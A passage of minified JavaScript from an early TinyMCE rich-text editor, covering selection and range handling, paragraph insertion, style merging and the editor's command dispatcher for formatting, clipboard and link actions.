null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, 